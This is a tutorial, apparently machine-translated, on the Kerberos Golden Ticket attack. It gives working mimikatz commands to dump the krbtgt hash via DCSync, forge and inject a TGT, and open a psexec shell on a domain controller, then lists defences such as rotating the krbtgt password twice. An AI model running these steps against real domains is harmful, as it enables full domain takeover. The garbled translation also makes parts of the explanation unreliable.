The first question: How do I prove that you are responsible for the problem user XXX Authentication Server
The second question: How Served know that you have access to the services it provides. When a Client to access a service on Server server, Server how to determine whether Client has permission to access the service on your own host. The responsibility of the Ticket Granting Server
The first question for the Kerberos protocol to be solved: how to prove you own XXX is the user's problem. An attacker put forward an idea, forged identification documents TGT tickets attack, so there is a methods of attack against Kerberos authentication - counterfeit bills TGT gold.
Golden Ticket (gold bill) through forged TGT (Ticket Granting Ticket), as long as there is a high privilege TGT, then it can be sent to any TGS TGS exchange services, can be said that both bills can forge gold highest domain authority.
TGT high permissions: includes PAC, PAC contains the Client's sid, where the group Client, fake domain administrator account and you have domain administrator privileges
ticket pass attack, by passing a Kerberos ticket, landing machines, referred to as PTT
Gold counterfeit bills
Since the TGT gold bill is counterfeit, so there is no AS-REQ or AS-REP domain controller (step 1 and 2) communicates directly to the third step as part of the authentication TGS-REQ is sent to the domain controller obtain a service ticket (TGS).
Gold production bills conditions:
1. Domain Name
2. The value of the domain SID # remove the last digit dash through whoamo / user and the rest is SID
3. KRBTGT domain account NTLM-HASH
4. forgery user name, the user name may be any
The first step in obtaining a hash value of krbtgt
By mimikatz in lsadump :: dcsync /domain:superman.com / user: krbtgt command to get the hash value of krbtgt
The second step counterfeit bills
:: golden generation function after golden ticket golden.kiribi get krbtgt hash mimikatz use of Kerberos, that is forged successful TGT
mimikatz # kerberos::golden /admin:administrator /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /krbtgt:5bba52548e7171b4529f93f758ef66e8 /ticket:golden.kiribi
The third step is to obtain permission
Empty local ticket cache, import counterfeit bills
kerberos :: list # View saved local bills, observe client name
kerberos :: purge # Clear local cache bill
Kerberos :: ptt golden kiribi # counterfeit gold import bill
kerberos :: list # View saved locally notes, observe whether the client name becomes the username of our bills
The fourth step of using forged bills gold
Use psexec tool psexec.exe \\ domain controller machine computer name cmd.exe
Get a cmd command line, whoami view the user for our forged administrator
Gold ticket usage scenarios: There is a domain amdin privileged user shell, get krbtgt, sid ntlm-hash and permissions, any user can be forged
Defensive approach:
1. Restrictions domain administrator logs on to any other computer except for a small number of domain controllers and the management server. This reduces the attacker via scale, access to domain administrator accounts, access permissions ntds.dit access to the domain controller of the Active Directory. If an attacker can not access the AD database (ntds.dit file), you can not get to KRBTGT account password.
2. KRBTGT recommended to change your password regularly. Change once, then let AD backup and change it again after 12-24 hours. This process should have no effect on the system environment. This process should be to ensure KRBTGT password change at least one standard method year by year.
3. Once the attacker to obtain the password hash KRBTGT account access, you can freely create a golden ticket. By quickly change KRBTGT password twice, so that any existing gold notes (and Kerberos tickets for all activities) fail. This will allow all Kerberos ticket is not valid, and the ability to eliminate the attacker uses its KRBTGT create effective gold tickets.
A third method of interpretation of the defense as follows:
Old Password
Login two machines
New Password 1
There is a new password 1. After logging on with the new password to log 1, but had to use the old password will not be off the assembly line
The new password 2
There is a new password 2. After logging on with the new password to log 2, but the user has logged in with the new password will not be off the assembly line 1
to sum up
1. Gold counterfeit bills to know krbtgt account NTLM-hash
2. Gold bills can be maintained at elevated privileges and permissions
3. Use mimikatz tools include win2003 error in gold import bill in the following win2003
Author: I want to become Superman